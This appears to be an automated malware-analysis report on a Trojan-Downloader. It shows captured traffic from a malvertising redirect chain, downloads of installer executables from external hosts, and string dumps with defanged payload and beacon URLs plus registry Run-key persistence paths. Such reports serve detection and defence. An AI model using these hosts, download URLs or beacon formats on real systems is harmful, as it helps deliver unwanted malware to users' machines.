GET /a/display.php?k=5767f84cb4a1512101637.51137939&h=bae4c68faacac27f1f8810fa61cadf9e765a3d52&ban=12101637&iid=1466431564327066441066058003570268&r=1203893&exp=prpd&ci==ov+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luKszGLt/OLszabt9Wq4yvu5xjN4p7+93bO5lyfvlWcprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t9W64o7e9ifP2gnu73fv5kX6q32bpiL/6mHP2gnu73fv5kXK/9W61luq+32bprbe81L+8p7O2gnu73fv5kX6q3e7sx+bvlOO6uXv43jN4p7+93bO5luqt9Wq4yvu5xjN4p7+93bO5lyfvlScprq/t9W66mHf9iPf6ujN4p7+93bO5lu6t3Obs/2bpjju71L+9YDe6uf/9mTeprebvlKu8rbe8YDe6uf/9mTep83bpdXK/&pm==Uq63Tep&pabt===w6rLf6&pc=l6rv+6rv+6rv+6rvxGbs2Ortpebp&sst=66.231/38.122/0.13/0/5.404&cbiframe=0&id=12101637&iuh==ofpuS8tpO70Cncqnybt1ert1mqspS7pVvMxnOtwJn6p8+7sxmas3K7s3m6tpS7pVvMxnOtwJn6p8Cbtwerspebq1ea1LT8pTLcypeKv2GN1nyrtpK7pTn8p0DP6jnu7QfKv3masnKszUr8p8K+6l7+8mfv6oT+rnebqzi62mv+6u3P6KXavlau8luap/abtpGrvpW7s1m6s+abp9W69uXK/&dmv===g22q6q2qK3&ddv=1&frab=0 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.adnetworkperformance.com
Connection: Keep-Alive
Cookie: acnetwork=c2f260da5767f84c7b4d97bac7


HTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 20 Jun 2016 14:06:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: acnetwork=c2f260da5767f84c7b4d97bac7; expires=Wed, 30-Dec-2037 23:00:00 GMT; Max-Age=679395235; path=/
Location: hXXp://evfomo.ru/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893
Vary: Accept-Encoding
X-RevProc-1: aab79e3367c3bb0b42f7ce5d6e5336bf = ok
71c..<html>.<head>.    <meta charset="UTF-8">.    <
title></title>. <link rel="dns-prefetch" href="http:\
/\/evfomo.ru\/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb149
0yo2hx3hhl52youffqvkfkkf?f_sid=1203893"/>. <noscript>.
<meta id="meta-refresh" http-equiv="refresh" content="0; url=ht
tp:\/\/evfomo.ru\/6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9sh
b1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893">. </noscript>.
<style>a {. color: #fff;. display: non
e;. visibility: hidden. }</style>. <scri
pt language="javascript">. if (window.opener) {.
window.opener.focus();. }. </script>.</head>.<
body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
.<a id="linker" href="hXXp://VVV.adnetworkperformance.com/ad/visit
.php?al=1">Click here</a>.<script type="text/javascript">
. window.location.replace("http:\/\/evfomo.ru\/6u
snmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youf
fqvkfkkf?f_sid=1203893");. ..(function(d) {....var advpix50353=
d.createElement('iframe');....advpix50353.src='//VVV.adnetworkperforma
nce.com/pix.html';....advpix50353.frameBorder=0;....advpix50353.seamle
ss='seamless';....advpix50353.allowTransparency = 'true';....advpix503
53.setAttribute('style','position:absolute;top:-1000px;left:-1000px;wi
dth:1px;height:1px;visibility:hidden;display:none;border:medium no

<<< skipped >>>

GET /YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: bapo.labst.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.2
Date: Mon, 20 Jun 2016 14:06:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 20 Jun 2016 14:06:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://itan.etudios.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0


GET /download/1/spacesoundpro-installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.wizzuniquify.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:57 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

The Trojan-Downloader connects to the servers at the following location(s):

%original file name%.exe_1756:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp\inetc.dll
/setup_mpck_en.exe
annel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0&v=2\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp
n/firas/en/setup_mpck_en.exe
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2A.tmp
nsf2A.tmp
//livestatscounter.com/Generic/vos.php?ch=
c284e5520c58d4087fd8a6f94bb3fb.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2D.tmp
n.php?r=vu_vo2_
dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1938953175.us-east-1.elb.amazonaws.com
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2C.tmp
url=hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2&errorlevel=0
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf5.tmp
dlgen.php?r=vu_vo2_
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
4444222

iexplore.exe_552:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

idscservice.exe_1920_rwx_00CD0000_00002000:

K.ix%

qnsm13.tmp_2596:

.text
`.rdata
@.data
.reloc
PPSetup.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
operator
GetProcessWindowStation
GetWindowsDirectoryW
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
4#4*4/4=4
3%3x3
;&;*;1;5;:;
reason=%i&cmd=%s
\StringFileInfo\xx\%s
Field Web Directory
hXXp://mobilitydata5.com/SysInfo/counthu.php?sid=%lld%lld%llu
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=%lld%lld%llu
NSIS_Inetc (Mozilla)
Content-Type: application/x-www-form-urlencoded
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp

wuauclt.exe_2908:

.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System

AutoTime.exe_496:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
r%f;M
4444444
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
%<>{}|\"^`
https
bad or invalid port number
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
Property not supported
src\TemporaryFile.cpp
src\BinaryWriter.cpp
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\DateTime.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\TextConverter.cpp
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
HTTP/1.0
HTTP/1.1
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HostEntry.cpp
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
Not a valid registry key
RegDeleteKeyExW
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Visual C++ CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
MaxPolicyElementKey
pExecutionResource
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\Task.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
src\NotificationCenter.cpp
src\ThreadPool.cpp
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\ErrorHandler.cpp
YeaLook.lnk
.d
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
?h=X-X-X-X-X-X&r=%s_%s&t=%s&typeid=%d&status=%d&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&t=%s&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&onlinetime=%d --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&InstallState=0
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=0
?h=X-X-X-X-X-X&r=%s_%s&d=%s&time=%d&first=%d
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&InstallState=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&Failstate=1
?h=X-X-X-X-X-X&r=%s_%s&SoftName=%s&DownState=0&PreCheck=1
url=%s
?h=X-X-X-X-X-X&r=%s_%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&hid=%s&geturl=%s&finish=%s --- sdadsada
F:\pz_git\vendor\inc\Poco/String.h
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
X:X:X:X:X:X
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
kernel32.dll
http\shell\open\command
%s /autostart
..\..\Src\Common\CommUtils.cpp
%s[%d]:%s
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
user32.dll
ntdll.dll
..\..\Src\Common\EncryptFile.cpp
%s[%d]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
_unlink: %s
Removing %s.
..\..\Src\Download\HttpDownload.cpp
FINISHED --%s--
Downloaded: %s bytes in %d files
No URLs found in %s.
Download quota (%s bytes) EXCEEDED!
Converted %d files in %.2f seconds.
Converting %s...
Unable to delete `%s': %s
Cannot convert links in %s: %s
%d-%d
Cannot back up %s as %s: %s
.orig
/index.html
%d; URL=%s
%s: %s: Not enough memory.
d:d:d
utime(%s): %s
d-d-d d:d:d
Failed to _unlink symlink `%s': %s
Get %.0f%% [%d/%d]
%.2f %s
%7.2f %s
Error parsing proxy URL %s: %s.
%s: %s.
Error in proxy URL %s: Must be HTTP.
%d redirections exceeded.
unlink: %s
%s.%d
ftp_proxy
http_proxy
..\..\Src\Download\DownLoadTask.cpp
Syntax error in Set-Cookie: %s at position %d.
Error in Set-Cookie, field `%s'
Cookie coming from %s attempted to set domain to %s
Cannot open cookies file `%s': %s
# Generated by Wget on %s.
# HTTP cookie file.
Error writing to `%s': %s
Error closing `%s': %s
PTF://
PTF://%s
hXXp://%s
Unsupported scheme
Bad port number
IPv6 addresses not supported
%s: %s
index.html
d\
*password*
%s: WGETRC points to %s, which doesn't exist.
%swget.ini
%s: Error in %s at line %d.
%s: Cannot read %s (%s).
%s: Invalid --execute command `%s'
%s: %s: Invalid boolean `%s', use `on' or `off'.
%s: %s: Invalid boolean `%s', use always, on, off, or never.
%s: %s: Invalid number `%s'.
%s: %s: Invalid byte value `%s'
%s: %s: Invalid time period `%s'
%s: %s: Invalid header `%s'.
HTTP/
Reusing connection to %s:%hu.
Referer: %s
Content-Type: application/x-www-form-urlencoded
POST data file missing: %s
%s %s HTTP/1.0
User-Agent: %s
Host: %s%s%s%s
Accept: %s
%s%s%s%s%s%s%s%s%s%s
Failed writing HTTP request: %s.
%s request sent, awaiting response...
Read error (%s) in headers.
- %s
http-equiv=
Location: %s%s
.html
(%s to go)
Refusing to truncate existing file `%s'.
File `%s' already there, will not retrieve.
Warning: wildcards not supported in HTTP.
--%s-- %s
%s => `%s'
(try:-)
Cannot write to `%s' (%s).
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
%d %s
%s URL:%s [%ld/%ld] -> "%s" [%d]
Server file no newer than local file `%s' -- not retrieving.
%s (%s) - `%s' saved [%ld/%ld]
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - `%s' saved [%ld]
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Connection closed at byte %ld.
%s (%s) - Connection closed at byte %ld/%ld.
%s (%s) - Read error at byte %ld/%ld (%s).
%s (%s) - Read error at byte %ld (%s).
%A, %d-%b-%y %T
%a, %d %b %Y %T
%a %b %d %T %Y
%a, %d-%b-%Y %T
%s: Basic %s
%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
Removing %s since it should be rejected.
http-equiv
%s: Cannot resolve incomplete link %s.
%s: Invalid URL %s: %s
%Y-%m-%d
%a %b %e %H:%M:%S %Y
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Resolving %s...
Found %s in g_host_name_addresses_map (%p)
failed: %s.
Wget %s%s
%s%s.HLP
Wget [%.0f%%] %s
Starting WinHelp %s
SetThreadExecutionState
Unable to convert `%s' to a bind address. Reverting to ANY.
Connecting to %s:%hu...
Connecting to %s[%s]:%hu...
Logging in as %s ...
%s@%s
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
==> SIZE %s ...
couldn't connect to %s:%hu: %s
==> PORT ...
socket: %s
Bind error (%s).
Invalid PORT.
REST failed; will not truncate `%s'.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
[%s to go]
Length: %s
%s (%s) - Data connection: %s;
%s: %s, closing control connection.
%s (%s) -
File `%s' already there, not retrieving.
%s URL: %s [%ld] -> "%s" [%d]
.listing
Remote file no newer than local file `%s' -- not retrieving.
Removed `%s'.
Skipping directory `%s'.
Remote file is newer than local file `%s' -- retrieving.
Symlinks not supported, skipping symlink `%s'.
%s: corrupt time-stamp.
%s: unknown/unsupported file type.
%s/%s
Rejecting `%s'.
Not descending to `%s' as it is excluded/not-included.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s'.
Wrote HTML-ized index to `%s' [%ld].
%*s[ skipping %dK ]
=%%
Invalid dot style specification `%s'; leaving unchanged.
-%%
%7.2f%s
ETA %d:d:d
ETA d:d
.netrc
login
password
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
/robots.txt
Cannot open %s: %s
Loading robots.txt; please ignore errors.
%s%s%s
--> PASS Turtle Power!
--> %s
331 s/key
331 opiekey
PORT
%d,%d,%d,%d,%d,%d
WINDOWS_NT
Unsupported listing type, trying Unix listing parser.
%s%s%s@
Index of /%s on %s:%d
d:d
%d %s d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
F:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
KeySize
: this object does't support a special last block
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
: this object doesn't support multiple channels
is not a valid key length
CryptoMaterial: this object does not support saving
CryptoMaterial: this object does not support loading
CryptoMaterial: this object does not support precomputation
GeneratableCryptoMaterial: this object does not support key/parameter generation
PK_MessageEncodingMethod: this signature scheme does not support message recovery
DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery
KeyDerivationParameters
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
for this key
: this key is too short to encrypt any messages
for this public key
PK_Signer: key too short for this signature scheme
operation failed with error
F:\pz_git\vendor\inc\Poco/ScopedLock.h
F:\pz_git\vendor\inc\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
?#%X.y
F:\pz_git\bin\AutoTime.pdb
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlW
WININET.dll
GetProcessHeap
CreatePipe
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegOpenKeyExA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
OPENGL32.dll
IPHLPAPI.DLL
VERSION.dll
GetCPInfo
RegQueryInfoKeyA
WS2_32.dll
PeekNamedPipe
